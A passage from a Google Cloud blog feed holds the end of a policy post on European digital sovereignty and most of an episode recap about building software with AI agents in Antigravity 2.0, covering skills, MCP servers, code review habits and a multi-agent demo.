&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Our own approach is built on this foundation: We offer open, portable infrastructure with &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/networking/eliminating-data-transfer-fees-when-migrating-off-google-cloud?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;no data transfer exit fees&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, we champion open AI models like Gemma, and we support open-standards applications. Our stack-wide open approach is designed to help European enterprises build, migrate, and scale without friction.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Yet organizations can’t maximize the benefits of an open approach because restrictive licensing practices lock customers into a single ecosystem. To restore true choice, we advocate for three straightforward reforms: allowing users to move their software licenses freely, ensuring fair pricing for legacy software, and guaranteeing that software runs equally well on any cloud platform.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;3. Building sustainable, open infrastructure for Europe's AI future&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Physical compute infrastructure is the bedrock of digital sovereignty. While we support the ambitions of the &lt;/span&gt;&lt;a href="https://digital-strategy.ec.europa.eu/en/library/proposal-chips-act-20" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Chips Act 2.0&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to invest €30 billion in European semiconductor research and development, we believe that this investment is just as important as establishing regulatory rules that attract large scale investments in compute infrastructure.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To help achieve that goal, we recommend the measures outlined below. As a long-standing investor in European data infrastructure, operating 13 European cloud regions and deepening that commitment with recent investments in Germany, Belgium and Sweden, we hope to see a policy that leverages the pace and scale of committed global investors like us. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We welcome the introduction of "special project" status to streamline permitting, grid access, and power purchase agreements (PPAs) in designated zones. To ensure these measures succeed, we support:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Prioritizing fast-track permitting benefits for highly sustainable infrastructure projects.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Aligning national sustainability criteria with the upcoming EU-wide rating scheme, ensuring it does not penalize energy-efficient technologies like water cooling.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Ensuring that these acceleration zones do not artificially constrain the geographic location of new sites, and extending supportive grid connection measures to viable data centers operating outside of designated zones.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;The path forward: Made with Europe&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As ministers prepare to gather for the upcoming Council Summit, Europe has a historic opportunity to build a resilient, competitive, and truly open digital future.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By championing open-source software — from our contributions to Kubernetes, Chromium, Android, TensorFlow, and open AI models like Gemma — and by co-engineering solutions with Europe's industrial leaders, we are proving that global innovation and European values can be furthered together.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We look forward to collaborating with Member States, European policymakers and our regional partners to ensure that the final Tech Sovereignty Package fosters local economic growth, safeguards national security, and keeps Europe at the cutting edge of global AI innovation.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/identity-security/choice-compliance-and-collaboration-europes-path-to-open-digital-sovereignty" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-18T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/developers-practitioners/agent-factory-recap-100x-engineering-with-ai-agents-in-google-antigravity-20</id>
    <title>Agent Factory Recap:  100X engineering with AI agents in Google Antigravity 2.0</title>
    <updated>2026-06-18T07:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;In this episode of the Agent Factory, I sat down with Rody Davis, one of Google’s top agentic engineers. We dive into the massive shift from traditional IDEs to agent-first platforms, the reality of code reviews in an AI-driven world, and how to use "skills" to perform at a 100X level.&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-video"&gt;



&lt;div class="article-module article-video "&gt;
  &lt;figure&gt;
    &lt;a class="h-c-video h-c-video--marquee" href="https://youtube.com/watch?v=Dk4MD6TNiWE"&gt;

      
        &lt;img alt="Episode 6 of the Agent Factory." src="//img.youtube.com/vi/Dk4MD6TNiWE/maxresdefault.jpg" /&gt;
      
      &lt;svg class="h-c-video__play h-c-icon h-c-icon--color-white" xmlns="http://www.w3.org/2000/svg"&gt;
        &lt;use xlink:href="#mi-youtube-icon" xmlns:xlink="http://www.w3.org/1999/xlink"&gt;&lt;/use&gt;
      &lt;/svg&gt;
    &lt;/a&gt;

    
  &lt;/figure&gt;
&lt;/div&gt;

&lt;div class="h-c-modal--video"&gt;
   &lt;a class="glue-yt-video" href="https://youtube.com/watch?v=Dk4MD6TNiWE"&gt;
   &lt;/a&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;This post guides you through the key ideas from our conversation. Use it to quickly recap topics or dive deeper into specific segments with links and timestamps.&lt;/p&gt;
&lt;h2&gt;Google Antigravity 2.0 - What is it?&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://antigravity.google/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Antigravity 2.0&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; has evolved from a simple agentic IDE into a full-scale agent-first platform. It now consists of four core pillars: a standalone desktop &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Agent Manager&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; for orchestration, a robust &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;CLI&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; for server-side work, an &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;SDK&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; for custom Python-based workflows, and a specialized &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;IDE&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;. This unbundled approach allows developers to compose their own environment, managing multiple folders and complex project structures without being forced into a single-workspace layout.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;Rody Davis on 100X Engineering&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We explored the strategies elite engineers use to scale their impact and reduce the "cognitive toil" of daily development.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Scaling Impact and Reducing Toil&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Timestamp: &lt;/span&gt;&lt;a href="https://www.youtube.com/watch?v=Dk4MD6TNiWE&amp;amp;t=115s" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;01:55&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Rody explains that AI isn't just about writing code; it's about accelerating the entire lifecycle. He uses agents to write richer test suites and prototype multiple versions of an app before committing to a framework. By offloading "toil", like building marketing sites, he can focus on high-level architecture and problem-solving.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Skills as "Context Cheat Sheets"&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Timestamp: &lt;/span&gt;&lt;a href="https://www.youtube.com/watch?v=Dk4MD6TNiWE&amp;amp;t=185s" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;03:05&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;A core philosophy in Rody’s workflow is the use of "Skills." He views skills as a way to compress context for the model. "It’s literally a cheat sheet for the agent," Rody notes. By providing the agent with specific design systems or API documentation, the model becomes significantly faster and more accurate, avoiding the latency of searching through massive, unorganized docs.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Customizations, Skills, and MCP Servers&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Timestamp: &lt;/span&gt;&lt;a href="https://www.youtube.com/watch?v=Dk4MD6TNiWE&amp;amp;list=PLIivdWyY5sqLXR1eSkiM5bE6pFlXC-OSs&amp;amp;index=1&amp;amp;t=257s" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;04:17&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="skills_better2" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/skills_better2.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;Rody walks us through the customizations tab in Antigravity 2.0, showing how to extend an agent's capabilities:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Android CLI:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Building and deploying mobile apps directly from the command line.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Modern Web Guidance:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Grounding the agent in the latest CSS and accessibility standards.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;MCP Servers:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Using the Model Context Protocol to enable features like hot reloading for Flutter and Dart.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;The Bonsai Approach to Code Review&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Timestamp: &lt;/span&gt;&lt;a href="https://www.youtube.com/watch?v=Dk4MD6TNiWE&amp;amp;t=327s" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;05:27&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Rody compares maintaining a codebase to being a Bonsai artist: constantly pruning to keep things simple. He advocates for flat architectures where state, UI, and data are strictly separated. This makes it easier for a human to "steer" the agent; if the agent starts putting files in the wrong place, the architectural violation is immediately obvious.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="bonsai" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/bonsai.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;Do you review 100% of agent-generated code?&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Timestamp: &lt;/span&gt;&lt;a href="https://www.youtube.com/watch?v=Dk4MD6TNiWE&amp;amp;t=431s" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;07:11&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Rody’s answer depends on the task. For a marketing site, he focuses on the visual output rather than the code. However, for backend logic, he cares deeply about API contracts and schemas. He recommends writing the first example yourself so the agent can simply "copy the pattern" for the rest of the codebase.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Building Extensions to Solve Daily Friction&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Timestamp: &lt;/span&gt;&lt;a href="https://www.youtube.com/watch?v=Dk4MD6TNiWE&amp;amp;t=545s" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;09:05&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;To solve the problem of managing files across multiple Git projects, Rody used Antigravity to build a custom macOS Finder extension in Swift. This tool allows him to filter files by time boxes (today, last week, etc.), demonstrating how agents can build specialized utilities that reduce daily friction.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="extensionscroped" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/extensionscroped.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;Do AI engineers still write code by hand?&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Timestamp: &lt;/span&gt;&lt;a href="https://www.youtube.com/watch?v=Dk4MD6TNiWE&amp;amp;t=622s" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;10:22&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;"Oh yeah," Rody says. He still loves the syntax of languages like Go and the challenge of controlling computers. He believes it's vital to understand the building blocks deeply so that when you face a problem two years down the road, you know exactly which "old project" to reach back for.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Powering Personal Websites with Gemma 4&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Timestamp: &lt;/span&gt;&lt;a href="https://www.youtube.com/watch?v=Dk4MD6TNiWE&amp;amp;t=702s" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;11:42&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Rody showcases his personal website, which uses &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/developers-practitioners/agent-factory-recap-how-gemma-4-taught-itself-physics?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemma 4&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and Embedding Gemma to provide dynamic content recommendations offline. By vectorizing post summaries at compile time, the site can suggest related content via a local vector database without needing a live backend server.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="gemma4websitecroped" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/gemma4websitecroped.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h2&gt;The Factory Floor&lt;/h2&gt;
&lt;p&gt;The Factory Floor is our segment for getting hands-on. Here, we moved from high-level concepts to practical code with live demos.&lt;/p&gt;
&lt;h3&gt;Multi-Agent Parallelism in Action&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Timestamp: &lt;/span&gt;&lt;a href="https://www.youtube.com/watch?v=Dk4MD6TNiWE&amp;amp;t=842s" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;14:02&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;I&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;n this demo, Rody uses a single stream-of-thought voice prompt to build a full-stack application. We watched as Antigravity:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Spun up parallel sub-agents, including a dedicated DevOps and QA engineer. (see &lt;/span&gt;&lt;a href="https://www.youtube.com/watch?v=Dk4MD6TNiWE&amp;amp;t=1188s" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;19:48&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Built a multilingual note-taking app using Vite, Go, and SQLite.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Orchestrated the entire stack via Docker Compose.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Localized the app into five different languages simultaneously.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="subagentscropped" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/subagentscropped.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;Unbundling the IDE Ecosystem&lt;/h3&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="image2" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/image2_FHRmWV2.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Timestamp: &lt;/span&gt;&lt;a href="https://www.youtube.com/watch?v=Dk4MD6TNiWE&amp;amp;t=935s" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;15:35&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We discussed why Google separated the IDE from the Agent Manager. Rody highlights that this unlocks different workflows: the CLI is perfect for SSH sessions on a Raspberry Pi, while the Agent Manager handles general knowledge work and orchestration across multiple folders.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Turning Documentation into Reusable Skills&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Timestamp: &lt;/span&gt;&lt;a href="https://www.youtube.com/watch?v=Dk4MD6TNiWE&amp;amp;t=1541s" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;25:41&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Rody shares his process for turning documentation into skills. He wrote a Go CLI that parses websites into markdown, allowing him to install hundreds of skills for the sites he visits frequently. This ensures the agent always has access to the specific version of the docs he is using.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Rapid Fire: Future Tech Predictions&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="hotjob" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/hotjob.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Timestamp: &lt;/span&gt;&lt;a href="https://www.youtube.com/watch?v=Dk4MD6TNiWE&amp;amp;t=1655s" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;27:35&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We put Rody on the spot with some controversial takes:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Vibe Coding:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Rody believes a non-technical founder will launch a company using only vibe coding by 2026, but the real test will be maintaining it in years 2 through 5.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Production Failures:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Rody agrees that vibe coding will cause significant production failures, leading to a new hot job for software engineers: consulting to solve those failures.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Codebase Health:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Rody argues that poor codebase health, not context windows, is the biggest bottleneck in AI speed.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Grounding Yourself in a Changing Landscape&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Timestamp: &lt;/span&gt;&lt;a href="https://www.youtube.com/watch?v=Dk4MD6TNiWE&amp;amp;t=1870s" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;31:10&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Rody advises engineers to focus on &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;why&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; they were hired: to solve problems and engineer things that didn't exist before. He suggests using AI to provide better communication handoffs between colleagues, making artifacts so easy to approve that they are "ready to sign off" the moment they are handed over.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Conclusion&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;The era of agentic engineering is here, but as Rody Davis demonstrated, it requires more architectural discipline, not less. By treating your codebase like a Bonsai tree and your agents like an orchestra, you can move past the "toil" and focus on building the frameworks of the future.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Your turn to build&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
